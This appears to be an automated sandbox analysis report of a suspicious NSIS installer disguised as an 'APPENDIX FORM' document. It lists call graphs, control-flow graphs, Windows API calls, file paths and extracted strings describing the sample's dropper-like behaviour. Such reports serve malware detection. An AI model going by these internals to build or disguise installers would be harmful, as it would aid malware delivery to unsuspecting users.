4512->4513 4514 4029ff 18 API calls 4513->4514 4515 402340 RegCreateKeyExA 4514->4515 4516 402665 4515->4516 4517 40236a 4515->4517 4518 402382 4517->4518 4519 4029ff 18 API calls 4517->4519 4520 40238e 4518->4520 4523 4029e2 18 API calls 4518->4523 4522 40237b lstrlenA 4519->4522 4521 4023a9 RegSetValueExA 4520->4521 4524 402f21 46 API calls 4520->4524 4525 4023bf RegCloseKey 4521->4525 4522->4518 4523->4520 4524->4521 4525->4516 5516 40261e 5517 402621 5516->5517 5519 402639 5516->5519 5520 40262e FindNextFileA 5517->5520 5518 4027bf 5519->5518 5522 405ce0 lstrcpynA 5519->5522 5520->5519 5522->5518 5530 100010e0 5531 1000110e 5530->5531 5532 1000123b 3 API calls 5531->5532 5535 1000111e 5532->5535 5533 100011c4 GlobalFree 5534 100012bf 2 API calls 5534->5535 5535->5533 5535->5534 5536 100011c3 5535->5536 5537 1000123b 3 API calls 5535->5537 5538 10001278 2 API calls 5535->5538 5539 10001155 GlobalAlloc 5535->5539 5540 100011ea GlobalFree 5535->5540 5541 100011b1 GlobalFree 5535->5541 5542 100012e8 lstrcpyA 5535->5542 5536->5533 5537->5535 5538->5541 5539->5535 5540->5535 5541->5535 5542->5535 5543 4016a1 5544 4029ff 18 API calls 5543->5544 5545 4016a7 GetFullPathNameA 5544->5545 5546 4016be 5545->5546 5552 4016df 5545->5552 5549 405fe4 2 API calls 5546->5549 5546->5552 5547 4016f3 GetShortPathNameA 5548 402894 5547->5548 5550 4016cf 5549->5550 5550->5552 5553 405ce0 lstrcpynA 5550->5553 5552->5547 5552->5548 5553->5552 5554 100029e3 5555 100029fb 5554->5555 5556 10001551 2 API calls 5555->5556 5557 10002a16 5556->5557 4527 401d26 GetDC GetDeviceCaps 4528 4029e2 18 API calls 4527->4528 4529 401d44 MulDiv ReleaseDC 4528->4529 4530 4029e2 18 API calls 4529->4530 4531 401d63 4530->4531 4532 405d02 18 API calls 4531->4532 4533 401d9c CreateFontIndirectA 4532->4533 4534 4024cd 4533->4534 5558 403727 5559 403732 5558->5559 5560 403736 5559->5560 5561 403739 GlobalAlloc 5559->5561 5561->5560 4730 40172c 4731 4029ff 18 API calls 4730->4731 4732 401733 4731->4732 4733 4059a0 2 API calls 4732->4733 4734 40173a 4733->4734 4735 4059a0 2 API calls 4734->4735 4735->4734 4736 401dac 4737 4029e2 18 API calls 4736->4737 4738 401db2 4737->4738 4739 4029e2 18 API calls 4738->4739 4740 401dbb 4739->4740 4741 401dc2 ShowWindow 4740->4741 4742 401dcd EnableWindow 4740->4742 4743 402894 4741->4743 4742->4743 5562 401eac 5563 4029ff 18 API calls 5562->5563 5564 401eb3 5563->5564 5565 405fe4 2 API calls 5564->5565 5566 401eb9 5565->5566 5568 401ecb 5566->5568 5569 405c3e wsprintfA 5566->5569 5569->5568 5570 40192d 5571 4029ff 18 API calls 5570->5571 5572 401934 lstrlenA 5571->5572 5573 4024cd 5572->5573 5581 401cb0 5582 4029e2 18 API calls 5581->5582 5583 401cc0 SetWindowLongA 5582->5583 5584 402894 5583->5584 5585 401a31 5586 4029e2 18 API calls 5585->5586 5587 401a37 5586->5587 5588 4029e2 18 API calls 5587->5588 5589 4019e1 5588->5589 5590 4024b1 5591 4029ff 18 API calls 5590->5591 5592 4024b8 5591->5592 5595 405971 GetFileAttributesA CreateFileA 5592->5595 5594 4024c4 5595->5594 4750 401e32 4751 4029ff 18 API calls 4750->4751 4752 401e38 4751->4752 4753 404fcb 25 API calls 4752->4753 4754 401e42 4753->4754 4755 405493 2 API calls 4754->4755 4759 401e48 4755->4759 4756 401e9e CloseHandle 4758 402665 4756->4758 4757 401e67 WaitForSingleObject 4757->4759 4760 401e75 GetExitCodeProcess 4757->4760 4759->4756 4759->4757 4759->4758 4763 406044 2 API calls 4759->4763 4761 401e92 4760->4761 4762 401e87 4760->4762 4761->4756 4765 401e90 4761->4765 4766 405c3e wsprintfA 4762->4766 4763->4757 4765->4756 4766->4765 4767 4015b3 4768 4029ff 18 API calls 4767->4768 4769 4015ba 4768->4769 4770 405809 4 API calls 4769->4770 4782 4015c2 4770->4782 4771 40160a 4773 401638 4771->4773 4774 40160f 4771->4774 4772 40579b CharNextA 4776 4015d0 CreateDirectoryA 4772->4776 4777 401423 25 API calls 4773->4777 4775 401423 25 API calls 4774->4775 4778 401616 4775->4778 4779 4015e5 GetLastError 4776->4779 4776->4782 4784 401630 4777->4784 4785 405ce0 lstrcpynA 4778->4785 4781 4015f2 GetFileAttributesA 4779->4781 4779->4782 4781->4782 4782->4771 4782->4772 4783 401621 SetCurrentDirectoryA 4783->4784 4785->4783 4786 402036 4787 4029ff 18 API calls 4786->4787 4788 40203d 4787->4788 4789 4029ff 18 API calls 4788->4789 4790 402047 4789->4790 4791 4029ff 18 API calls 4790->4791 4792 402051 4791->4792 4793 4029ff 18 API calls 4792->4793 4794 40205b 4793->4794 4795 4029ff 18 API calls 4794->4795 4796 402065 4795->4796 4797 40207b CoCreateInstance 4796->4797 4798 4029ff 18 API calls 4796->4798 4801 40209a 4797->4801 4803 40214f 4797->4803 4798->4797 4799 401423 25 API calls 4800 402183 4799->4800 4802 402131 MultiByteToWideChar 4801->4802 4801->4803 4802->4803 4803->4799 4803->4800 5596 4014b7 5597 4014bd 5596->5597 5598 401389 2 API calls 5597->5598 5599 4014c5 5598->5599 4804 401bb8 4805 4029e2 18 API calls 4804->4805 4806 401bbf 4805->4806 4807 4029e2 18 API calls 4806->4807 4808 401bc9 4807->4808 4809 401bd9 4808->4809 4810 4029ff 18 API calls 4808->4810 4811 401be9 4809->4811 4812 4029ff 18 API calls 4809->4812 4810->4809 4813 401bf4 4811->4813 4814 401c38 4811->4814 4812->4811 4815 4029e2 18 API calls 4813->4815 4816 4029ff 18 API calls 4814->4816 4818 401bf9 4815->4818 4817 401c3d 4816->4817 4819 4029ff 18 API calls 4817->4819 4820 4029e2 18 API calls 4818->4820 4821 401c46 FindWindowExA 4819->4821 4822 401c02 4820->4822 4825 401c64 4821->4825 4823 401c28 SendMessageA 4822->4823 4824 401c0a SendMessageTimeoutA 4822->4824 4823->4825 4824->4825 5600 10002179 5601 100021de 5600->5601 5603 10002214 5600->5603 5602 100021f0 GlobalAlloc 5601->5602 5601->5603 5602->5601 5604 4062ba 5605 40613e 5604->5605 5606 406aa9 5605->5606 5607 4061c8 GlobalAlloc 5605->5607 5608 4061bf GlobalFree 5605->5608 5609 406236 GlobalFree 5605->5609 5610 40623f GlobalAlloc 5605->5610 5607->5605 5607->5606 5608->5607 5609->5610 5610->5605 5610->5606 4826 40243c 4827 402b09 19 API calls 4826->4827 4828 402446 4827->4828 4829 4029e2 18 API calls 4828->4829 4830 40244f 4829->4830 4831 402472 RegEnumValueA 4830->4831 4832 402466 RegEnumKeyA 4830->4832 4834 402665 4830->4834 4833 40248b RegCloseKey 4831->4833 4831->4834 4832->4833 4833->4834 4836 40223d 4837 402245 4836->4837 4838 40224b 4836->4838 4840 4029ff 18 API calls 4837->4840 4839 40225b 4838->4839 4841 4029ff 18 API calls 4838->4841 4842 402269 4839->4842 4843 4029ff 18 API calls 4839->4843 4840->4838 4841->4839 4844 4029ff 18 API calls 4842->4844 4843->4842 4845 402272 WritePrivateProfileStringA 4844->4845 4846 40173f 4847 4029ff 18 API calls 4846->4847 4848 401746 4847->4848 4849 401764 4848->4849 4850 40176c 4848->4850 4886 405ce0 lstrcpynA 4849->4886 4887 405ce0 lstrcpynA 4850->4887 4853 401777 4855 405770 3 API calls 4853->4855 4854 40176a 4857 405f4b 5 API calls 4854->4857 4856 40177d lstrcatA 4855->4856 4856->4854 4864 401789 4857->4864 4858 405fe4 2 API calls 4858->4864 4859 4017ca 4860 40594c 2 API calls 4859->4860 4860->4864 4862 4017a0 CompareFileTime 4862->4864 4863 401864 4865 404fcb 25 API calls 4863->4865 4864->4858 4864->4859 4864->4862 4864->4863 4867 405ce0 lstrcpynA 4864->4867 4873 405d02 18 API calls 4864->4873 4882 4054f4 MessageBoxIndirectA 4864->4882 4883 40183b 4864->4883 4885 405971 GetFileAttributesA CreateFileA 4864->4885 4868 40186e 4865->4868 4866 404fcb 25 API calls 4872 401850 4866->4872 4867->4864 4869 402f21 46 API calls 4868->4869 4871 401881 4869->4871 4870 401895 SetFileTime 4874 4018a7 CloseHandle 4870->4874 4871->4870 4871->4874 4873->4864 4874->4872 4875 4018b8 4874->4875 4876 4018d0 4875->4876 4877 4018bd 4875->4877 4879 405d02 18 API calls 4876->4879 4878 405d02 18 API calls 4877->4878 4880 4018c5 lstrcatA 4878->4880 4881 4018d8 4879->4881 4880->4881 4884 4054f4 MessageBoxIndirectA 4881->4884 4882->4864 4883->4866 4883->4872 4884->4872 4885->4864 4886->4854 4887->4853 5611 40163f 5612 4029ff 18 API calls 5611->5612 5613 401645 5612->5613 5614 405fe4 2 API calls 5613->5614 5615 40164b 5614->5615 5616 404f3f 5617 404f63 5616->5617 5618 404f4f 5616->5618 5620 404f6b IsWindowVisible 5617->5620 5624 404f82 5617->5624 5619 404f55 5618->5619 5628 404fac 5618->5628 5622 40401a SendMessageA 5619->5622 5623 404f78 5620->5623 5620->5628 5621 404fb1 CallWindowProcA 5625 404f5f 5621->5625 5622->5625 5626 404896 5 API calls 5623->5626 5624->5621 5627 404916 4 API calls 5624->5627 5626->5624 5627->5628 5628->5621 5629 40193f 5630 4029e2 18 API calls 5629->5630 5631 401946 5630->5631 5632 4029e2 18 API calls 5631->5632 5633 401950 5632->5633 5634 4029ff 18 API calls 5633->5634 5635 401959 5634->5635 5636 40196c lstrlenA 5635->5636 5638 4019a7 5635->5638 5637 401976 5636->5637 5637->5638 5642 405ce0 lstrcpynA 5637->5642 5640 401990 5640->5638 5641 40199d lstrlenA 5640->5641 5641->5638 5642->5640

                                                                                                              Executed Functions

                                                                                                              Function 00403219 Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 324stringfilecomCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 403219-4032b0 #17 SetErrorMode OleInitialize call 40600b SHGetFileInfoA call 405ce0 GetCommandLineA call 405ce0 GetModuleHandleA 7 4032b2-4032b7 0->7 8 4032bc-4032d1 call 40579b CharNextA 0->8 7->8 11 403396-40339a 8->11 12 4033a0 11->12 13 4032d6-4032d9 11->13 16 4033b3-4033cd GetTempPathA call 4031e5 12->16 14 4032e1-4032e9 13->14 15 4032db-4032df 13->15 18 4032f1-4032f4 14->18 19 4032eb-4032ec 14->19 15->14 15->15 25 403425-40343f DeleteFileA call 402c7b 16->25 26 4033cf-4033ed GetWindowsDirectoryA lstrcatA call 4031e5 16->26 20 403386-403393 call 40579b 18->20 21 4032fa-4032fe 18->21 19->18 20->11 40 403395 20->40 23 403300-403306 21->23 24 403316-403343 21->24 28 403308-40330a 23->28 29 40330c 23->29 30 403345-40334b 24->30 31 403356-403384 24->31 43 4034d3-4034e2 call 403677 OleUninitialize 25->43 44 403445-40344b 25->44 26->25 42 4033ef-40341f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e5 26->42 28->24 28->29 29->24 35 403351 30->35 36 40334d-40334f 30->36 31->20 38 4033a2-4033ae call 405ce0 31->38 35->31 36->31 36->35 38->16 40->11 42->25 42->43 54 4034e8-4034f8 call 4054f4 ExitProcess 43->54 55 4035dc-4035e2 43->55 47 4034c3-4034ca call 403769 44->47 48 40344d-403458 call 40579b 44->48 56 4034cf 47->56 57 40345a-403483 48->57 58 40348e-403498 48->58 60 4035e4-403601 call 40600b * 3 55->60 61 40365f-403667 55->61 56->43 62 403485-403487 57->62 65 40349a-4034a7 call 40585e 58->65 66 4034fe-403518 lstrcatA lstrcmpiA 58->66 87 403603-403605 60->87 88 40364b-403656 ExitWindowsEx 60->88 63 403669 61->63 64 40366d-403671 ExitProcess 61->64 62->58 70 403489-40348c 62->70 63->64 65->43 78 4034a9-4034bf call 405ce0 * 2 65->78 66->43 72 40351a-40352f CreateDirectoryA SetCurrentDirectoryA 66->72 70->58 70->62 75 403531-403537 call 405ce0 72->75 76 40353c-403564 call 405ce0 72->76 75->76 86 40356a-403586 call 405d02 DeleteFileA 76->86 78->47 96 4035c7-4035ce 86->96 97 403588-403598 CopyFileA 86->97 87->88 91 403607-403609 87->91 88->61 93 403658-40365a call 40140b 88->93 91->88 98 40360b-40361d GetCurrentProcess 91->98 93->61 96->86 100 4035d0-4035d7 call 405b94 96->100 97->96 99 40359a-4035ba call 405b94 call 405d02 call 405493 97->99 98->88 105 40361f-403641 98->105 99->96 112 4035bc-4035c3 CloseHandle 99->112 100->43 105->88 112->96
                                                                                                              APIs
                                                                                                              • #17.COMCTL32 ref: 0040323A
                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403245
                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040324C
                                                                                                                • Part of subcall function 0040600B: GetModuleHandleA.KERNEL32(?,?,?,0040325E,00000008), ref: 0040601D
                                                                                                                • Part of subcall function 0040600B: LoadLibraryA.KERNELBASE(?,?,?,0040325E,00000008), ref: 00406028
                                                                                                                • Part of subcall function 0040600B: GetProcAddress.KERNEL32(00000000,?), ref: 00406039
                                                                                                              • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403274
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
                                                                                                              • GetCommandLineA.KERNEL32(Centraleuropisk Setup,NSIS Error), ref: 00403289
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000), ref: 0040329C
                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000020), ref: 004032C7
                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004033C4
                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004033D5
                                                                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033E1
                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033F5
                                                                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004033FD
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040340E
                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403416
                                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040342A
                                                                                                              • OleUninitialize.OLE32(?), ref: 004034D8
                                                                                                              • ExitProcess.KERNEL32 ref: 004034F8
                                                                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",00000000,?), ref: 00403504
                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403510
                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040351C
                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 00403523
                                                                                                              • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357C
                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,0041E8A0,?), ref: 00403590
                                                                                                              • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BD
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,?), ref: 00403612
                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364E
                                                                                                              • ExitProcess.KERNEL32 ref: 00403671
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                              • String ID: "$"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry$C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen$C:\Users\user\Desktop$C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe$Centraleuropisk Setup$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                              • API String ID: 4107622049-4215202488
                                                                                                              • Opcode ID: b395d4fddee78296a5d69c8e442308374256a494fb247fe93a3a0ba23709092c
                                                                                                              • Instruction ID: 7fa91be0df980d7df711fed2a4ed052ffc20252d69ef6f5c306a31a697f91405
                                                                                                              • Opcode Fuzzy Hash: b395d4fddee78296a5d69c8e442308374256a494fb247fe93a3a0ba23709092c
                                                                                                              • Instruction Fuzzy Hash: C5B117706083516EE7216F659D4DA2B3EACAB45306F44447FF4817A2E2C77C9E01CB6E
                                                                                                              Function 00405D02 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 454 405d02-405d0d 455 405d20-405d35 454->455 456 405d0f-405d1e 454->456 457 405f28-405f2c 455->457 458 405d3b-405d46 455->458 456->455 460 405f32-405f3c 457->460 461 405d58-405d62 457->461 458->457 459 405d4c-405d53 458->459 459->457 463 405f47-405f48 460->463 464 405f3e-405f42 call 405ce0 460->464 461->460 462 405d68-405d6f 461->462 465 405d75-405daa 462->465 466 405f1b 462->466 464->463 468 405db0-405dbb GetVersion 465->468 469 405ec5-405ec8 465->469 470 405f25-405f27 466->470 471 405f1d-405f23 466->471 472 405dd5 468->472 473 405dbd-405dc1 468->473 474 405ef8-405efb 469->474 475 405eca-405ecd 469->475 470->457 471->457 481 405ddc-405de3 472->481 473->472 478 405dc3-405dc7 473->478 476 405f09-405f19 lstrlenA 474->476 477 405efd-405f04 call 405d02 474->477 479 405edd-405ee9 call 405ce0 475->479 480 405ecf-405edb call 405c3e 475->480 476->457 477->476 478->472 483 405dc9-405dcd 478->483 492 405eee-405ef4 479->492 480->492 485 405de5-405de7 481->485 486 405de8-405dea 481->486 483->472 488 405dcf-405dd3 483->488 485->486 490 405e23-405e26 486->490 491 405dec-405e07 call 405bc7 486->491 488->481 495 405e36-405e39 490->495 496 405e28-405e34 GetSystemDirectoryA 490->496 497 405e0c-405e0f 491->497 492->476 494 405ef6 492->494 498 405ebd-405ec3 call 405f4b 494->498 500 405ea3-405ea5 495->500 501 405e3b-405e49 GetWindowsDirectoryA 495->501 499 405ea7-405eaa 496->499 502 405e15-405e1e call 405d02 497->502 503 405eac-405eb0 497->503 498->476 499->498 499->503 500->499 504 405e4b-405e55 500->504 501->500 502->499 503->498 507 405eb2-405eb8 lstrcatA 503->507 509 405e57-405e5a 504->509 510 405e6f-405e85 SHGetSpecialFolderLocation 504->510 507->498 509->510 512 405e5c-405e63 509->512 513 405ea0 510->513 514 405e87-405e9e SHGetPathFromIDListA CoTaskMemFree 510->514 515 405e6b-405e6d 512->515 513->500 514->499 514->513 515->499 515->510
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405DB3
                                                                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E2E
                                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E41
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7D
                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405E8B
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00405E96
                                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB8
                                                                                                              • lstrlenA.KERNEL32(Call,?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405F0A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 900638850-1230650788
                                                                                                              • Opcode ID: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                                                                              • Instruction ID: 2b293d25366fc547a30ad863a8204623ae8d1739f01cc20b9afdcfd3690b1d74
                                                                                                              • Opcode Fuzzy Hash: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                                                                              • Instruction Fuzzy Hash: 46611271A04A05AAEB215F24EC88BBF3B68EB15310F10813BE541B62D1D37D4A42DF9E
                                                                                                              Function 004055A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 516 4055a0-4055c6 call 40585e 519 4055c8-4055da DeleteFileA 516->519 520 4055df-4055e6 516->520 521 405769-40576d 519->521 522 4055e8-4055ea 520->522 523 4055f9-405609 call 405ce0 520->523 524 4055f0-4055f3 522->524 525 405717-40571c 522->525 529 405618-405619 call 4057b7 523->529 530 40560b-405616 lstrcatA 523->530 524->523 524->525 525->521 528 40571e-405721 525->528 531 405723-405729 528->531 532 40572b-405733 call 405fe4 528->532 533 40561e-405621 529->533 530->533 531->521 532->521 539 405735-405749 call 405770 call 405558 532->539 537 405623-40562a 533->537 538 40562c-405632 lstrcatA 533->538 537->538 540 405637-405655 lstrlenA FindFirstFileA 537->540 538->540 554 405761-405764 call 404fcb 539->554 555 40574b-40574e 539->555 542 40565b-405672 call 40579b 540->542 543 40570d-405711 540->543 550 405674-405678 542->550 551 40567d-405680 542->551 543->525 545 405713 543->545 545->525 550->551 556 40567a 550->556 552 405682-405687 551->552 553 405693-4056a1 call 405ce0 551->553 557 405689-40568b 552->557 558 4056ec-4056fe FindNextFileA 552->558 566 4056a3-4056ab 553->566 567 4056b8-4056c3 call 405558 553->567 554->521 555->531 560 405750-40575f call 404fcb call 405b94 555->560 556->551 557->553 562 40568d-405691 557->562 558->542 564 405704-405707 FindClose 558->564 560->521 562->553 562->558 564->543 566->558 569 4056ad-4056b6 call 4055a0 566->569 576 4056e4-4056e7 call 404fcb 567->576 577 4056c5-4056c8 567->577 569->558 576->558 579 4056ca-4056da call 404fcb call 405b94 577->579 580 4056dc-4056e2 577->580 579->558 580->558
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 004055C9
                                                                                                              • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405611
                                                                                                              • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405632
                                                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405638
                                                                                                              • FindFirstFileA.KERNELBASE(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405649
                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F6
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405707
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004055AE
                                                                                                              • \*.*, xrefs: 0040560B
                                                                                                              • "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 004055A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-128552741
                                                                                                              • Opcode ID: b64be4ea1155d549a92e54fdb5038b20d055016f2d82b64bdc1b1eb88874929d
                                                                                                              • Instruction ID: be8413790da27f3485791dfb71ea9e97d61aa92783f5c3743ff415ab50f27cdc
